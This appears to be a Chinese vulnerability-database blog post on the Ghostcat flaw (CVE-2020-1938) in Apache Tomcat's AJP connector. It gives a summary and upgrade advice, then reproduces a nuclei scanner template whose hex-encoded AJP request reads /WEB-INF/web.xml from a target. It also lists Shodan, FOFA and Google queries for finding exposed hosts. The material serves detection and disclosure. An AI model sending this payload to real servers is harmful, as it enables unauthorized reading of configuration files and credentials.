Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability

漏洞信息

漏洞名称: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability

漏洞编号:

  • CVE: CVE-2020-1938

  • CNVD: CNVD-2020-10487

漏洞类型: 文件读取

漏洞等级: 严重

漏洞描述: Apache Tomcat是一个广泛使用的开源Java Servlet容器,实现了Java EE的Servlet和JSP规范,常用于企业级Web应用的部署。由于其高性能和稳定性,Tomcat在全球范围内被众多企业和开发者采用。

该漏洞被称为Ghostcat,涉及Apache Tomcat的AJP(Apache JServ Protocol)协议。AJP协议默认在Tomcat中启用,监听所有配置的IP地址。攻击者可以利用AJP协议的高信任特性,通过构造恶意请求读取Web应用中的任意文件,甚至在某些条件下执行远程代码。漏洞的根本原因在于Tomcat对AJP连接的处理不当,未能充分验证和限制来自AJP协议的请求。

此漏洞的影响极为严重,攻击者无需认证即可利用,可能导致敏感信息泄露(如配置文件、源代码、凭证等),在特定条件下还可实现远程代码执行,完全控制受影响的服务器。由于AJP协议默认启用且广泛部署,该漏洞对使用受影响版本Tomcat的系统构成了重大威胁。建议用户立即升级到Apache Tomcat 9.0.31、8.5.51或7.0.100及以上版本,或禁用不必要的AJP连接器以缓解风险。

产品厂商: Apache

产品名称: Apache Tomcat

影响版本: 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99

搜索语法: title=”apache tomcat”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012, NaN-KoreLogic
  severity: critical
  description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
    read-size: 1024
    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
http://example.com/2025/07/06/github_2847602443/
作者
lianccc
发布于
2025年7月6日
许可协议